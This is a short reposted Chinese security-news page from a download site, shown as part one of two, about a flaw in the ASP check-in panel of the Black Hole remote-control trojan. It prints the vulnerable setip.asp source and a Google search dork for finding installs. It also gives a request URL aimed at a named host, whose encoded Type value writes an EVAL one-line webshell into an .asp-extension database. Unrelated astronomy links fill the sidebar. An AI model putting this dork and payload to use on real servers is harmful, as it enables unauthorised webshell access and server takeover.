IT资讯/综合软件下载站!┆ 最新软件 最新文章 最新手机 UFO外星人 网站分类

您当前的位置→图文中心新闻资讯安全播报黑洞的ASP上线系统的一个漏洞

黑洞的ASP上线系统的一个漏洞


2009/7/10 9:52:00 编辑:佚名 来源:本站整理 
今天给大家分享黑洞的ASP上线系统的一个漏洞安全播报文章。喜欢黑洞的ASP上线系统的一个漏洞的可以分享黑洞的ASP上线系统的一个漏洞给你的好友。

在默认的情况下, 利用该漏洞可得到上线系统所在服务器的webshell

喜欢安全播报的网友不妨去看看下面的文章:
  • ASP上线系统中保存上线IP信息的数据库的扩展名默认为asp

    写入配置时对参数未作检查, setip.asp相关代码

    <%
    strIP=Trim(Request.QueryString("Ip"))
    strPort=Trim(Request.QueryString("Port"))
    strType=Trim(Request.QueryString("Type"))

    if strType="0" then
    strIP=Request.ServerVariables("REMOTE_HOST")
    end if

    sql="select * from Info where strMark='Main'"
    rs.Open sql,conn,1,3
    if not rs.eof or not rs.bof then
    rs("strIPAddress")=strIP
    rs("strPort")=strPort
    rs("strType")=strType
    rs.update
    '不要修改下面的反馈字符.否则程序不知道是否更新成功.
    response.write "update success!"
    else
    response.write "update fail!"
    end if
    set rs=nothing
    conn.close
    set conn=nothing

    以“inurl:setip.asp”为关键字找了一个测试地址http://zomei.com/blackhole/setip.asp

    提交
    http://zomei.com/blackhole/setip.asp?Type=%A9%E0%B0Y%CE%DB%A0%84%9F%A8%94%B3%AC%9B%A1%C5%A1%D4%A9%CD%90%F7

    这样就插入了EVAL一句话

    12下一页

    相关文章
  • 时间穿梭黑洞是去另一个宇宙的入口
  • 天文学家首次观察到两个超质量黑洞相互环绕!
  • 超质量黑洞可能揭露宇宙暗藏的第五种力
  • 科学家在实验室里造出了分子黑洞,吞食周遭的一切!
  • 天文学家在超质量黑洞附近发现奇怪的神秘物体!
  • 超大质量黑洞如何吞噬恒星?你将看到整个过程
  • 物理学家可能发现侦测裸奇异点的方法,比黑洞还要怪异
  • 天文学家发现有史以来最靠近黑洞环绕的恒星!
  • 相关推荐
    发表评论
    栏目列表
    阅读排行
    网站帮助 - 广告合作 - 下载声明 - 网站地图